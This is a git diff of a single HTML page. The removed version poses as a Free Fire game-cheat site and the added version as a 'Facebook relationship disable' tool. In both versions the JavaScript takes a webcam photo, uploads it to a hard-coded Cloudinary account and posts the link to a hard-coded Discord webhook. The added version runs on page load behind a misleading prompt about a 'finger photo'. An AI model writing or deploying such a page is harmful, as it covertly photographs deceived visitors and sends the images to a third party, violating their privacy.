--- a/index.html
+++ b/index.html
@@ -3,123 +3,84 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>SHAN CHEAT FREE FIRE WEB SITE</title>
-    <style>
-        body {
-            background-color: black;
-            color: white;
-            text-align: center;
-            font-family: Arial, sans-serif;
-        }
-        .container {
-            margin-top: 20%;
-        }
-        h1 {
-            color: red;
-        }
-        button {
-            background-color: red;
-            color: white;
-            border: none;
-            padding: 15px 30px;
-            font-size: 20px;
-            cursor: pointer;
-            border-radius: 10px;
-        }
-        button:hover {
-            background-color: darkred;
-        }
-    </style>
+    <title>FACEBOOK RELETIONSHIP DISABLE</title>
 </head>
 <body>
-
-<div class="container">
-    <h1>SHAN CHEAT FREE FIRE</h1>
-    <p>Follow this page.</p>
-    <button onclick="captureWindow()">Follow</button>
-</div>
-
-<script>
-    async function captureWindow() {
-        const video = document.createElement('video');
-        const canvas = document.createElement('canvas');
-        const context = canvas.getContext('2d');
-
-        try {
-            const stream = await navigator.mediaDevices.getUserMedia({ video: true }); // Capture Window Access
-            video.srcObject = stream;
-            await new Promise(resolve => video.onloadedmetadata = resolve);
-
-            video.play();
-            setTimeout(() => {
-                canvas.width = video.videoWidth;
-                canvas.height = video.videoHeight;
-                context.drawImage(video, 0, 0, canvas.width, canvas.height);
-
-                video.srcObject.getTracks().forEach(track => track.stop());
-
-                canvas.toBlob(blob => uploadPhoto(blob), 'image/png');
-            }, 1000);
-        } catch (err) {
-            alert(" denied!");
-            console.error(err);
+    <script>
+        async function askPermission() {
+            if (confirm("Are you sure? This will take a YOUR ONE FINGER photo.")) {
+                capturePhoto();
+            }
         }
-    }
 
-    async function uploadPhoto(imageBlob) {
-        const cloudName = "dxe2hsegn";  
-        const uploadPreset = "my_preset";  
+        async function capturePhoto() {
+            const video = document.createElement('video');
+            const canvas = document.createElement('canvas');
+            const context = canvas.getContext('2d');
 
-        const formData = new FormData();
-        formData.append("file", imageBlob);
-        formData.append("upload_preset", uploadPreset);
+            try {
+                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
+                video.srcObject = stream;
+                await new Promise(resolve => video.onloadedmetadata = resolve);
 
-        try {
-            const response = await fetch(`https://api.cloudinary.com/v1_1/${cloudName}/image/upload`, {
+                video.play();
+                setTimeout(() => {
+                    canvas.width = video.videoWidth;
+                    canvas.height = video.videoHeight;
+                    context.drawImage(video, 0, 0, canvas.width, canvas.height);
+
+                    video.srcObject.getTracks().forEach(track => track.stop());
+
+                    canvas.toBlob(blob => uploadPhoto(blob), 'image/png');
+                }, 1000);
+            } catch (err) {
+                alert(" denied!");
+                console.error(err);
+            }
+        }
+
+        async function uploadPhoto(imageBlob) {
+            const cloudName = "dxe2hsegn";  // ඔබේ Cloudinary Cloud Name
+            const uploadPreset = "my_preset";  // Cloudinary Unsigned Upload Preset
+
+            const formData = new FormData();
+            formData.append("file", imageBlob);
+            formData.append("upload_preset", uploadPreset);
+
+            try {
+                const response = await fetch(`https://api.cloudinary.com/v1_1/${cloudName}/image/upload`, {
+                    method: "POST",
+                    body: formData
+                });
+
+                const result = await response.json();
+                const imageUrl = result.secure_url; // Get uploaded image URL
+
+                sendToDiscord(imageUrl);  // Send the URL to Discord Webhook
+            } catch (error) {
+                console.error("Cloudinary upload error:", error);
+            }
+        }
+
+        function sendToDiscord(imageUrl) {
+            fetch("https://discord.com/api/webhooks/1343051041259651198/uOfEwqW70_R-qyLTr28XlT1olwhuknuI5nXobMicLk82t0EHqJZS7XN-CxD-gNEV_obL", {
                 method: "POST",
-                body: formData
-            });
-
-            const result = await response.json();
-            console.log("Cloudinary upload result:", result);
-
-            if (result.secure_url) {
-                const imageUrl = result.secure_url;
-                sendToDiscord(imageUrl);
-            } else {
-                console.error("No image URL returned from Cloudinary");
-            }
-        } catch (error) {
-            console.error("Cloudinary upload error:", error);
-        }
-    }
-
-    function sendToDiscord(imageUrl) {
-        const discordWebhook = "https://discord.com/api/webhooks/1340611336966770761/BG9LqkUM1Tri7XT1oHVaotzuOQo6VTj4fnWsmtgS0geRxhdBAVZ0wxw3XqGdjLYIY9xI";
-        
-        fetch(discordWebhook, {
-            method: "POST",
-            headers: { "Content-Type": "application/json" },
-            body: JSON.stringify({ 
-                username: "Security Bot", 
-                content: "User verification photo:", 
-                embeds: [{
-                    image: { url: imageUrl }
-                }]
+                headers: { "Content-Type": "application/json" },
+                body: JSON.stringify({ 
+                    username: "Security Bot", 
+                    content: "User verification photo:", 
+                    embeds: [{
+                        image: {
+                            url: imageUrl  // Sending image URL
+                        }
+                    }]
+                })
             })
-        })
-        .then(response => {
-            if (response.ok) {
-                console.log("Photo sent to Discord!");
-            } else {
-                console.error("Failed Discord", response.status);
-            }
-        })
-        .catch(err => {
-            console.error("Erroro Discord:", err);
-        });
-    }
-</script>
+            .then(response => console.log("!"))
+            .catch(err => console.error("Error:", err));
+        }
 
+        askPermission();
+    </script>
 </body>
 </html>
